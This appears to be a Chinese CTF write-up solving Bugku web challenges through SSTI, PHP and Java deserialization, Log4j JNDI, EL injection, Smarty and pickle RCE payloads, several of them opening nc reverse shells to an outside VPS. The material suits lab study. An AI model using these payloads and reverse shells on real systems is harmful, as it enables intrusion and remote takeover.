Simple_SSTI_2 1 http://114.67.175.224:12259/?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
闪电十六鞭 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 <?php error_reporting (0 ); require __DIR__ .'/flag.php' ; $exam = 'return\'' .sha1 (time ()).'\';' ; if (!isset ($_GET ['flag' ])) { echo '<a href="./?flag=' .$exam .'">Click here</a>' ; } else if (strlen ($_GET ['flag' ]) != strlen ($exam )) { echo '长度不允许' ; } else if (preg_match ('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is' , $_GET ['flag' ])) { echo '关键字不允许' ; } else if (eval ($_GET ['flag' ]) === sha1 ($flag )) { echo $flag ; } else { echo '马老师发生甚么事了' ; } echo '<hr>' ; highlight_file (__FILE__ );
1 2 3 <?php $exam = 'return\'' .sha1 (time ()).'\';' ;var_dump ($exam );
得到是49位
我们先绕过关键字
1 flag=$a='fla9';$a[3]='g';
然后再用自定义字符来绕过哈希,其中别忘了闭合eval
1 http://114.67.175.224:11972/?flag=$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111
安慰奖 先看源码,然后扫描拿到源码index.php.bak
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 <?php header ("Content-Type: text/html;charset=utf-8" );error_reporting (0 );echo "<!-- YmFja3Vwcw== -->" ;class ctf { protected $username = 'hack' ; protected $cmd = 'NULL' ; public function __construct ($username ,$cmd ) { $this ->username = $username ; $this ->cmd = $cmd ; } function __wakeup ( ) { $this ->username = 'guest' ; } function __destruct ( ) { if (preg_match ("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i" , $this ->cmd)) { exit ('</br>flag能让你这么容易拿到吗?<br>' ); } if ($this ->username === 'admin' ) { $a = `$this ->cmd`; var_dump ($a ); }else { echo "</br>给你个安慰奖吧,hhh!</br>" ; die (); } } } $select = $_GET ['code' ]; $res =unserialize (@$select ); ?>
只需要绕过一下wakeup就好了
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php class ctf { protected $username ; protected $cmd ; public function __construct ($cmd ,$username ) { $this ->cmd=$cmd ; $this ->username =$username ; } } $a =new ctf ('ls' ,'admin' );echo urlencode (serialize ($a ));
1 http://114.67.175.224:18318/?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A6%3A%22tac+f%2A%22%3B%7D
decrypt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 <?php $key = md5 ('ISCC' );$x = 0 ;$base64_str = 'fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=' ;$data = base64_decode ($base64_str );$len = strlen ($data );$char = '' ;$str = '' ;$klen = strlen ($key );for ($i =0 ; $i < $len ; $i ++) { if ($x == $klen ) { $x = 0 ; } $char .= $key [$x ]; $x +=1 ; } for ($i =0 ; $i < $len ; $i ++) { if (ord ($data [$i ]) > ord ($char [$i ])) { $str .= chr (ord ($data [$i ]) - ord ($char [$i ])); } else { $str .= chr (128 +ord ($data [$i ])-ord ($char [$i ])); } print ($str ."\n" ); } ?>
Apache Log4j2 RCE 1 https://github.com/welk1n/JNDI-Injection-Exploit
1 2 3 4 5 6 7 8 git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 1.cd JNDI-Injection-Exploit 2.mvn clean package -DskipTests 3.java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "VPS_IP" java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc 156.238.233.93 9999 -e /bin/sh" -A "156.238.233.93"
中途我的mvn配置文件还不对,搞好一会儿
先用bp的DNSLOG进行探测一下
1 ${jndi:ldap://roj1ec4qvt9q7rfcigcrnaen9ef43t.oastify.com}
说明存在
1 2 3 ${jndi:[攻击payload]} ${jndi:ldap://156.238.233.93:1389/ujydjs} 用户名或密码错误,次数 87
一直弹不上,有没有师傅弹上的评论区娇娇
摇人了,找了Anyyy 师傅,这里说的要在vps上面进行
1 2 3 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc 156.238.233.93 9999 -e /bin/sh" -A "156.238.233.93" ${jndi:ldap://156.238.233.93:1389/gykkfc}
成功了
newphp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 <?php header ("Content-type: text/html; charset=utf-8" );highlight_file (__FILE__ );class evil { public $hint ; public function __construct ($hint ) { $this ->hint = $hint ; } public function __destruct ( ) { if ($this ->hint==="hint.php" ) @$this ->hint = base64_encode (file_get_contents ($this ->hint)); var_dump ($this ->hint); } function __wakeup ( ) { if ($this ->hint != "╭(●`∀´●)╯" ) { $this ->hint = "╰(●’◡’●)╮" ; } } } class User { public $username ; public $password ; public function __construct ($username , $password ) { $this ->username = $username ; $this ->password = $password ; } } function write ($data ) { global $tmp ; $data = str_replace (chr (0 ).'*' .chr (0 ), '\0\0\0' , $data ); $tmp = $data ; } function read ( ) { global $tmp ; $data = $tmp ; $r = str_replace ('\0\0\0' , chr (0 ).'*' .chr (0 ), $data ); return $r ; } $tmp = "test" ;$username = $_POST ['username' ];$password = $_POST ['password' ];$a = serialize (new User ($username , $password ));if (preg_match ('/flag/is' ,$a )) die ("NoNoNo!" ); unserialize (read (write ($a )));
字符逃逸这里每次能逃逸三个字符,现在就是利用反序列化去得到hint
1 2 3 4 5 6 <?php class evil { public $hint ='hint.php' ; } $a =new evil ();echo serialize ($a );
先这么写出来,稍微修改一下源码看看怎么替换的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 <?php header ("Content-type: text/html; charset=utf-8" );highlight_file (__FILE__ );class evil { public $hint ; public function __construct ($hint ) { $this ->hint = $hint ; } public function __destruct ( ) { if ($this ->hint==="hint.php" ) @$this ->hint = base64_encode (file_get_contents ($this ->hint)); var_dump ($this ->hint); } function __wakeup ( ) { if ($this ->hint != "╭(●`∀´●)╯" ) { $this ->hint = "╰(●’◡’●)╮" ; } } } class User { public $username ; public $password ; public function __construct ($username , $password ) { $this ->username = $username ; $this ->password = $password ; } } function write ($data ) { global $tmp ; $data = str_replace (chr (0 ).'*' .chr (0 ), '\0\0\0' , $data ); $tmp = $data ; } function read ( ) { global $tmp ; $data = $tmp ; $r = str_replace ('\0\0\0' , chr (0 ).'*' .chr (0 ), $data ); return $r ; } $tmp = "test" ;$username = $_POST ['username' ];$password = $_POST ['password' ];$a = serialize (new User ($username , $password ));echo $a ."\n\n" ;if (preg_match ('/flag/is' ,$a )) die ("NoNoNo!" ); unserialize (read (write ($a )));$b =read (write ($a ));echo $b ;
1 2 ";s:8:"password";s:41: # 这里是22个字符
为了补齐,我们慢慢调试
1 2 3 4 O:4:"User":2:{s:8:"username";s:6:"*";s:8:"password";s:44:"1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}";} ";s:8:"password";s:44:"1 # 这里就是24个字符了
1 username=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}
1 2 3 4 <?php $hint = "index.cgi" ;
到了这里发现可以任意文件读取,只不过需要我们%0a
命令执行一下
1 http://114.67.175.224:13015/index.cgi?name=%0afile:///flag
sodirty 这里扫描拿到源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 var express = require ('express' );const setFn = require ('set-value' );var router = express.Router ();const Admin = { "password" :process.env .password ?process.env .password :"password" } router.post ("/getflag" , function (req, res, next ) { if (req.body .password === undefined || req.body .password === req.session .challenger .password ){ res.send ("登录失败" ); }else { if (req.session .challenger .age > 79 ){ res.send ("糟老头子坏滴很" ); } let key = req.body .key .toString (); let password = req.body .password .toString (); if (Admin [key] === password){ res.send (process.env .flag ? process.env .flag : "flag{test}" ); }else { res.send ("密码错误,请使用管理员用户名登录." ); } } }); router.get ('/reg' , function (req, res, next ) { req.session .challenger = { "username" : "user" , "password" : "pass" , "age" : 80 } res.send ("用户创建成功!" ); }); router.get ('/' , function (req, res, next ) { res.redirect ('index' ); }); router.get ('/index' , function (req, res, next ) { res.send ('<title>BUGKU-登录</title><h1>前端被炒了<br><br><br><a href="./reg">注册</a>' ); }); router.post ("/update" , function (req, res, next ) { if (req.session .challenger === undefined ){ res.redirect ('/reg' ); }else { if (req.body .attrkey === undefined || req.body .attrval === undefined ) { res.send ("传参有误" ); }else { let key = req.body .attrkey .toString (); let value = req.body .attrval .toString (); setFn (req.session .challenger , key, value); res.send ("修改成功" ); } } }); module .exports = router;
一进来看到set-value
可以能行污染,这里我们先污染age再污染密码,这里写exp,手动污染一直不成功
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 import requestss=requests.Session() url="http://114.67.175.224:16250/" def reg (url ): url=url+"reg" r=s.get(url) print (r.text) def update (url,data ): url=url+"update" r=s.post(url,data=data) print (r.text) def getflag (url,data ): url=url+"getflag" r=s.post(url,data=data) print (r.text) reg(url) data={"attrkey" :"age" ,"attrval" :"18" } update(url,data) data={"attrkey" :"__proto__.pwd" ,"attrval" :"wi" } update(url,data) data={"password" :"wi" ,"key" :"pwd" } getflag(url,data)
诶有师傅可能会像我一样想着最后两步是怎么回事,代码看看就知道了
Java EL表达式注入 进来之后抓包得到source.zip
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 POST /updateSysSetting HTTP/1.1 Host : 114.67.175.224:14902Content-Length : 93X-Requested-With : XMLHttpRequestUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : application/json, text/javascript, */*; q=0.01Content-Type : application/json;charset=UTF-8Origin : http://114.67.175.224:14902Referer : http://114.67.175.224:14902/system-base.htmlAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D; BUGKU=s:13:"ctf.bugku.com"; connect.sid=s%3A478RrwhL0Ye-o8q96b9ULtxrdrs6WqLv.7ispJfiYcU6CmcvWVtS7DmyGugH6nAz44mGI%2BPEuYMA; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744; HMACCOUNT=405D29F9AFFEA4E6; Hm_lpvt_080836300300be57b7f34f4b3e97d911=1731934972Connection : close{"exp" :"[' 115.195 .167 .159 ',' 115.195 .167 .159 ',' 164.90 .230 .201 ', ' 174.87 .232 .68 ']" ,"limit" :"6" }
OK那弹shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 POST /updateSysSetting HTTP/1.1 Host : 114.67.175.224:14902Content-Length : 239X-Requested-With : XMLHttpRequestUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : application/json, text/javascript, */*; q=0.01Content-Type : application/json;charset=UTF-8Origin : http://114.67.175.224:14902Referer : http://114.67.175.224:14902/system-base.htmlAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D; BUGKU=s:13:"ctf.bugku.com"; connect.sid=s%3A478RrwhL0Ye-o8q96b9ULtxrdrs6WqLv.7ispJfiYcU6CmcvWVtS7DmyGugH6nAz44mGI%2BPEuYMA; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744; HMACCOUNT=405D29F9AFFEA4E6; Hm_lpvt_080836300300be57b7f34f4b3e97d911=1731934972Connection : close{ "exp" : "''.getClass().forName(' java.lang.Run'+'time' ).getMethod('exec' ,'' .getClass()).invoke('' .getClass().forName('java.lang.Run' +'time' ).getMethod('getRu' +'ntime' ).invoke(null),'nc 156.238.233.93 9999 -e /bin/sh' ))", " limit": " 60 " }
ez_java_serialize 打CC5的链子
1 2 3 4 5 java -jar ysoserial.jar CommonsCollections5 "nc 156.238.233.93 9999 -e /bin/bash" |base64 -w0 >poc.bin scp E:\javaexp\ysoserial.jar root@156.238.233.93:/root/ scp E:\javaexp\JNDI-Injection-Exploit\target\JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar root@156.238.233.93:/root/
然后我们发包
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 POST /hello HTTP/1.1 Host : 114.67.175.224:16818Content-Length : 2735Pragma : no-cacheCache-Control : no-cacheOrigin : http://114.67.175.224:16818Content-Type : application/x-www-form-urlencodedUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer : http://114.67.175.224:16818/helloAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D; BUGKU=s:13:"ctf.bugku.com"; connect.sid=s%3A478RrwhL0Ye-o8q96b9ULtxrdrs6WqLv.7ispJfiYcU6CmcvWVtS7DmyGugH6nAz44mGI%2BPEuYMA; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744; HMACCOUNT=405D29F9AFFEA4E6; Hm_lpvt_080836300300be57b7f34f4b3e97d911=1731935015Connection : closename= rO0 ABXNyAC5 qYXZheC5 tYW5 hZ2 VtZW50 LkJhZEF0 dHJpYnV0 ZVZhbHVlRXhwRXhjZXB0 aW9 u1 Ofaq2 MtRkACAAFMAAN2 YWx0 ABJMamF2 YS9 sYW5 nL09 iamVjdDt4 cgATamF2 YS5 sYW5 nLkV4 Y2 VwdGlvbtD9 Hz4 aOxzEAgAAeHIAE2 phdmEubGFuZy5 UaHJvd2 FibGXVxjUnOXe4 ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9 UaHJvd2 FibGU7 TAANZGV0 YWlsTWVzc2 FnZXQAEkxqYXZhL2 xhbmcvU3 RyaW5 nO1 sACnN0 YWNrVHJhY2 V0 AB5 bTGphdmEvbGFuZy9 TdGFja1 RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2 VkRXhjZXB0 aW9 uc3 QAEExqYXZhL3 V0 aWwvTGlzdDt4 cHEAfgAIcHVyAB5 bTGphdmEubGFuZy5 TdGFja1 RyYWNlRWxlbWVudDsCRio8 PP0 iOQIAAHhwAAAAA3 NyABtqYXZhLmxhbmcuU3 RhY2 tUcmFjZUVsZW1 lbnRhCcWaJjbdhQIACEIABmZvcm1 hdEkACmxpbmVOdW1 iZXJMAA9 jbGFzc0 xvYWRlck5 hbWVxAH4 ABUwADmRlY2 xhcmluZ0 NsYXNzcQB%2 BAAVMAAhmaWxlTmFtZXEAfgAFTAAKbWV0 aG9 kTmFtZXEAfgAFTAAKbW9 kdWxlTmFtZXEAfgAFTAANbW9 kdWxlVmVyc2 lvbnEAfgAFeHABAAAAUXQAA2 FwcHQAJnlzb3 NlcmlhbC5 wYXlsb2 Fkcy5 Db21 tb25 zQ29 sbGVjdGlvbnM1 dAAYQ29 tbW9 uc0 NvbGxlY3 Rpb25 zNS5 qYXZhdAAJZ2 V0 T2 JqZWN0 cHBzcQB%2 BAAsBAAAAM3 EAfgANcQB%2 BAA5 xAH4 AD3 EAfgAQcHBzcQB%2 BAAsBAAAAInEAfgANdAAZeXNvc2 VyaWFsLkdlbmVyYXRlUGF5 bG9 hZHQAFEdlbmVyYXRlUGF5 bG9 hZC5 qYXZhdAAEbWFpbnBwc3 IAH2 phdmEudXRpbC5 Db2 xsZWN0 aW9 ucyRFbXB0 eUxpc3 R6 uBe0 PKee3 gIAAHhweHNyADRvcmcuYXBhY2 hlLmNvbW1 vbnMuY29 sbGVjdGlvbnMua2 V5 dmFsdWUuVGllZE1 hcEVudHJ5 iq3 SmznBH9 sCAAJMAANrZXlxAH4 AAUwAA21 hcHQAD0 xqYXZhL3 V0 aWwvTWFwO3 hwdAADZm9 vc3 IAKm9 yZy5 hcGFjaGUuY29 tbW9 ucy5 jb2 xsZWN0 aW9 ucy5 tYXAuTGF6 eU1 hcG7 llIKeeRCUAwABTAAHZmFjdG9 yeXQALExvcmcvYXBhY2 hlL2 NvbW1 vbnMvY29 sbGVjdGlvbnMvVHJhbnNmb3 JtZXI7 eHBzcgA6 b3 JnLmFwYWNoZS5 jb21 tb25 zLmNvbGxlY3 Rpb25 zLmZ1 bmN0 b3 JzLkNoYWluZWRUcmFuc2 Zvcm1 lcjDHl%2 BwoepcEAgABWwANaVRyYW5 zZm9 ybWVyc3 QALVtMb3 JnL2 FwYWNoZS9 jb21 tb25 zL2 NvbGxlY3 Rpb25 zL1 RyYW5 zZm9 ybWVyO3 hwdXIALVtMb3 JnLmFwYWNoZS5 jb21 tb25 zLmNvbGxlY3 Rpb25 zLlRyYW5 zZm9 ybWVyO71 WKvHYNBiZAgAAeHAAAAAFc3 IAO29 yZy5 hcGFjaGUuY29 tbW9 ucy5 jb2 xsZWN0 aW9 ucy5 mdW5 jdG9 ycy5 Db25 zdGFudFRyYW5 zZm9 ybWVyWHaQEUECsZQCAAFMAAlpQ29 uc3 RhbnRxAH4 AAXhwdnIAEWphdmEubGFuZy5 SdW50 aW1 lAAAAAAAAAAAAAAB4 cHNyADpvcmcuYXBhY2 hlLmNvbW1 vbnMuY29 sbGVjdGlvbnMuZnVuY3 RvcnMuSW52 b2 tlclRyYW5 zZm9 ybWVyh%2 Bj%2 Fa3 t8 zjgCAANbAAVpQXJnc3 QAE1 tMamF2 YS9 sYW5 nL09 iamVjdDtMAAtpTWV0 aG9 kTmFtZXEAfgAFWwALaVBhcmFtVHlwZXN0 ABJbTGphdmEvbGFuZy9 DbGFzczt4 cHVyABNbTGphdmEubGFuZy5 PYmplY3 Q7 kM5 YnxBzKWwCAAB4 cAAAAAJ0 AApnZXRSdW50 aW1 ldXIAEltMamF2 YS5 sYW5 nLkNsYXNzO6 sW167 LzVqZAgAAeHAAAAAAdAAJZ2 V0 TWV0 aG9 kdXEAfgAvAAAAAnZyABBqYXZhLmxhbmcuU3 RyaW5 noPCkOHo7 s0 ICAAB4 cHZxAH4 AL3 NxAH4 AKHVxAH4 ALAAAAAJwdXEAfgAsAAAAAHQABmludm9 rZXVxAH4 ALwAAAAJ2 cgAQamF2 YS5 sYW5 nLk9 iamVjdAAAAAAAAAAAAAAAeHB2 cQB%2 BACxzcQB%2 BACh1 cgATW0 xqYXZhLmxhbmcuU3 RyaW5 nO63 SVufpHXtHAgAAeHAAAAABdAAjbmMgMTU2 LjIzOC4 yMzMuOTMgOTk5 OSAtZSAvYmluL2 Jhc2 h0 AARleGVjdXEAfgAvAAAAAXEAfgA0 c 3 EAfgAkc3 IAEWphdmEubGFuZy5 JbnRlZ2 VyEuKgpPeBhzgCAAFJAAV2 YWx1 ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4 IsCAAB4 cAAAAAFzcgARamF2 YS51 dGlsLkhhc2 hNYXAFB9 rBwxZg0 QMAAkYACmxvYWRGYWN0 b3 JJAAl0 aHJlc2 hvbGR4 cD9 AAAAAAAAAdwgAAAAQAAAAAHh4
这里要进行编码不然二进制,别人看不懂,所以不认
聪明的php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 include ('./libs/Smarty.class.php' );echo "pass a parameter and maybe the flag file's filename is random :>" ;$smarty = new Smarty ();if ($_GET ){ highlight_file ('index.php' ); foreach ($_GET AS $key => $value ) { print $key ."\n" ; if (preg_match ("/flag|\/flag/i" , $value )){ $smarty ->display ('./template.html' ); }elseif (preg_match ("/system|readfile|gz|exec|eval|cat|assert|file|fgets/i" , $value )){ $smarty ->display ('./template.html' ); }else { $smarty ->display ("eval:" .$value ); } } } ?>
Smarty框架,使用这个姿势RCE
1 2 3 {if phpinfo()}{/if} {if%20passthru('tac /_5510')}{/if}
Python Pickle Unserializer 扫描出source
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 import pickleimport base64from flask import Flask, requestapp = Flask(__name__) @app.route("/" , methods=["GET" ] ) def index (): return """ Not Found The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. """ , 666 , [("TIPS" , "/source" )]@app.route("/source" , methods=["GET" ] ) def source (): with open (__file__, "r" ) as fp: return fp.read() @app.route("/flag" , methods=["PUT" ] ) def get_flag (): try : data = request.json if data: return pickle.loads(base64.b64decode(data["payload" ])) return "MISSED" except : return "OH NO!!!" if __name__ == '__main__' : app.run(host="0.0.0.0" , port=80 )
pickle反序列化,弹shell或者RCE
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import base64import pickleimport subprocessimport httpxclass A : def __reduce__ (self ): s = ''' import subprocess r = subprocess.run( 'cat flag', shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) print(r.stdout.decode()) ''' return (subprocess.check_output, (["python3" ,"-c" ,s],)) a = A() data = { 'payload' : base64.b64encode(pickle.dumps(a)).decode() } a = base64.b64decode(data['payload' ]) r = httpx.put('http://114.67.175.224:13379/flag' , json=data) print (f'r:{r.text} ' )
CaaS1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 from flask import Flask, request, render_template, render_template_string, redirectimport subprocessimport urllibapp = Flask(__name__) def blacklist (inp ): blacklist = ['mro' ,'url' ,'join' ,'attr' ,'dict' ,'()' ,'init' ,'import' ,'os' ,'system' ,'lipsum' ,'current_app' ,'globals' ,'subclasses' ,'|' ,'getitem' ,'popen' ,'read' ,'ls' ,'flag.txt' ,'cycler' ,'[]' ,'0' ,'1' ,'2' ,'3' ,'4' ,'5' ,'6' ,'7' ,'8' ,'9' ,'=' ,'+' ,':' ,'update' ,'config' ,'self' ,'class' ,'%' ,'#' ] for b in blacklist: if b in inp: return "Blacklisted word!" if len (inp) <= 70 : return inp if len (inp) > 70 : return "Input too long!" @app.route('/' ) def main (): return redirect('/generate' ) @app.route('/generate' ,methods=['GET' ,'POST' ] ) def generate_certificate (): if request.method == 'GET' : return render_template('generate_certificate.html' ) elif request.method == 'POST' : name = blacklist(request.values['name' ]) teamname = request.values['team_name' ] return render_template_string(f'<p>Haha! No certificate for {name} </p>' ) if __name__ == '__main__' : app.run(host='0.0.0.0' , port=80 )
这里明明是可以直接RCE的
1 2 3 http://114.67.175.224:13324/generate?x=__import__('os').popen('tac flag.txt').read() POST: name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g
noteasytrick 明天做
我来了,今天修评论用了很多时间,现在来做一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 <?php error_reporting (0 );ini_set ("display_errors" ,"Off" );class Jesen { public $filename ; public $content ; public $me ; function __wakeup ( ) { $this ->me = new Ctf (); } function __destruct ( ) { $this ->me->open ($this ->filename,$this ->content); } } class Ctf { function __toString ( ) { return "die" ; } function open ($filename , $content ) { if (!file_get_contents ("./sandbox/lock.lock" )){ echo file_get_contents (substr ($_POST ['b' ],0 ,30 )); die (); }else { file_put_contents ("./sandbox/" .md5 ($filename .time ()),$content ); die ("or you can guess the final filename?" ); } } } if (!isset ($_POST ['a' ])){ highlight_file (__FILE__ ); die (); }else { if (($_POST ['b' ] != $_POST ['a' ]) && (md5 ($_POST ['b' ]) === md5 ($_POST ['a' ]))){ unserialize ($_POST ['c' ]); } }
进来就有源码,这里我们先绕过wakeup先删除./sandbox/lock.lock
,然后就可以利用文件进行flag的读取
这里30个字符
1 ./../../../../../../../../flag
但是由于本身不熟悉,wakeup之后destruct之后还是否触发,于是写个demo测试一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 <?php error_reporting (0 );highlight_file (__FILE__ );class ctfshow { public function __wakeup ( ) { echo "wakeup\n" ; } public function __destruct ( ) { system ($this ->ctfshow); } } $data = $_GET ['1+1>2' ];if (!preg_match ("/^[Oa]:[\d]+/i" , $data )){ unserialize ($data ); } ?>
1 2 3 4 5 6 7 <?php class ctfshow { public $ctfshow ='whoami' ; } $a =new SplObjectStorage ();$a ->a=new ctfshow ();echo serialize ($a );
成功RCE,那么写个poc删除文件,但是用什么呢,翻看我的原生类笔记发现ZipArchive
的open
方法可以做到
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php class Jesen { public $filename ='./sandbox/lock.lock' ; public $content =8 ; public $me ; } $a =new Jesen ();$zip =new ZipArchive ();$a ->me=$zip ;$b =serialize ($a );echo $b ;
然后发包
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST / HTTP/1.1 Host : 114.67.175.224:16474User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Upgrade-Insecure-Requests : 1Referer : http://114.67.175.224:16474/Accept-Encoding : gzip, deflateCookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language : zh-CN,zh;q=0.9,en;q=0.8Content-Type : application/x-www-form-urlencodedOrigin : http://114.67.175.224:16474Pragma : no-cacheCache-Control : no-cacheContent-Length : 390a %5 B%5 D=1 &b%5 B%5 D=2 &c=O%3 A5%3 A%22 Jesen%22 %3 A4%3 A%7 Bs%3 A8%3 A%22 filename%22 %3 Bs%3 A19%3 A%22 .%2 Fsandbox%2 Flock.lock%22 %3 Bs%3 A7%3 A%22 content%22 %3 Bi%3 A8%3 Bs%3 A2%3 A%22 me%22 %3 BO%3 A10%3 A%22 ZipArchive%22 %3 A5%3 A%7 Bs%3 A6%3 A%22 status%22 %3 Bi%3 A0%3 Bs%3 A9%3 A%22 statusSys%22 %3 Bi%3 A0%3 Bs%3 A8%3 A%22 numFiles%22 %3 Bi%3 A0%3 Bs%3 A8%3 A%22 filename%22 %3 Bs%3 A0%3 A%22 %22 %3 Bs%3 A7%3 A%22 comment%22 %3 Bs%3 A0%3 A%22 %22 %3 B%7 D%7 D
再访问文件发现没了,那就可以了
然后使用fastcoll
,这里1.txt里面写那30个字符,然后生成文件(不会用的可以看我SHCTF2024那个文章,那是我第一次使用),然后验证看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php function readmyfile ($path ) { $fh = fopen ($path , "rb" ); $data = fread ($fh , filesize ($path )); fclose ($fh ); return $data ; } $a = urlencode (readmyfile ("E:/CTFtools/fastcoll_v1.0.0.5.exe/1_msg1.txt" ));$b = urlencode (readmyfile ("E:/CTFtools/fastcoll_v1.0.0.5.exe/1_msg2.txt" ));if (md5 ((string )urldecode ($a ))===md5 ((string )urldecode ($b ))){echo $a ."\n" ."\n" ;} if (urldecode ($a )!=urldecode ($b )){echo $b ;}
完美,那么现在再写poc打就行
1 2 3 4 5 6 7 8 <?php class Jesen { public $username ; public $content ; public $me ; } $a =new Jesen ();echo serialize ($a );
发包
